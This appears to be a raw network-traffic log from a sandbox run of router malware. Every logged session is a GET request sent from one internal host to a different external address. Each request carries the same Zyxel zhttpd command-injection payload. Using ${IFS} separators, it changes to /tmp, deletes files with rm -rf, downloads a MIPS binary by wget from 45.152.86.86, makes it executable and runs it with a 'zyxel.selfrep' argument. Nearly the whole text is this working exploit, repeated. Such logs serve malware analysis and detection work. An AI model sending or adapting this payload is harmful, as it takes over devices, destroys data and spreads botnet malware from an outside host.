                                        Mar 31, 2024 09:20:48.469685078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2446192.168.2.2333278193.239.184.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469762087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2447192.168.2.234566668.214.177.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469798088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2448192.168.2.2339184198.163.187.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469836950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2449192.168.2.233957243.36.54.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469887972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2450192.168.2.235370059.229.175.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469929934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2451192.168.2.235326094.156.114.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469996929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2452192.168.2.2343102135.217.193.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470046043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2453192.168.2.2357776112.226.80.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470082998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2454192.168.2.235172418.115.227.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470154047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2455192.168.2.2354612170.54.221.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470185995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2456192.168.2.2337660212.212.57.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470237017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2457192.168.2.2342548139.96.216.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470283031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2458192.168.2.2347026130.183.126.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470314026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2459192.168.2.234833668.238.251.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470360041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2460192.168.2.235351434.152.85.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470402002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2461192.168.2.234875690.244.160.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470458984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2462192.168.2.233483875.230.253.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470499992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2463192.168.2.234493239.111.18.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470547915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2464192.168.2.2351622179.11.102.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470604897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2465192.168.2.2350318207.240.213.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470637083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2466192.168.2.233537664.61.43.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470689058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2467192.168.2.2358786170.118.37.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470729113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2468192.168.2.2337454123.205.122.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470766068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2469192.168.2.2343058201.215.225.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470810890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2470192.168.2.2344310212.225.34.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470856905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2471192.168.2.2340138213.226.15.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470894098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2472192.168.2.2333160146.129.169.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.470947981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2473192.168.2.2332974208.212.121.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471000910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2474192.168.2.2342516106.182.196.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471043110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2475192.168.2.2359804202.96.186.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471086025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2476192.168.2.233889852.55.135.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471117973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2477192.168.2.233307617.177.78.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471159935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2478192.168.2.2352974136.132.110.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471215010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2479192.168.2.2341272183.14.75.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471265078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2480192.168.2.234983084.112.213.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471318960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2481192.168.2.2342438118.175.212.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471354008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2482192.168.2.23331261.148.135.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471402884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2483192.168.2.235640024.16.9.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471432924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2484192.168.2.234595839.242.38.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471477985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2485192.168.2.235979878.157.167.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471520901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2486192.168.2.2347206118.14.123.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471580982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2487192.168.2.234527452.149.209.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471637011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2488192.168.2.2358552176.78.128.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471688986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2489192.168.2.234156618.53.212.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471740961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2490192.168.2.2350956119.249.93.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471779108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2491192.168.2.234817297.173.23.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471815109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2492192.168.2.2343292195.82.123.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471868992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2493192.168.2.234390866.158.181.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471923113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2494192.168.2.2335470183.146.50.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.471971035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2495192.168.2.235489644.208.71.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472021103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2496192.168.2.2360876213.72.82.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472064018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2497192.168.2.2347418176.148.116.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472099066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2498192.168.2.2358230189.63.7.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472136021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2499192.168.2.2346080168.122.180.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472173929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2500192.168.2.233788038.171.172.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472244024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2501192.168.2.2348938105.131.170.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472269058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2502192.168.2.233360876.222.12.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472332954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2503192.168.2.233787076.193.49.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472368002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2504192.168.2.234955636.80.18.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472425938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2505192.168.2.2358220141.157.254.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472486973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2506192.168.2.234393674.118.208.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472516060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2507192.168.2.235473082.195.146.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472574949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2508192.168.2.235307097.245.177.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472628117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2509192.168.2.233323081.15.234.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472665071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2510192.168.2.2354806211.179.123.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472712040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2511192.168.2.2334086133.77.246.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472747087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2512192.168.2.2344442122.170.171.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.472794056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2513192.168.2.2338944220.24.133.162443
                                        TimestampBytes transferredDirectionData
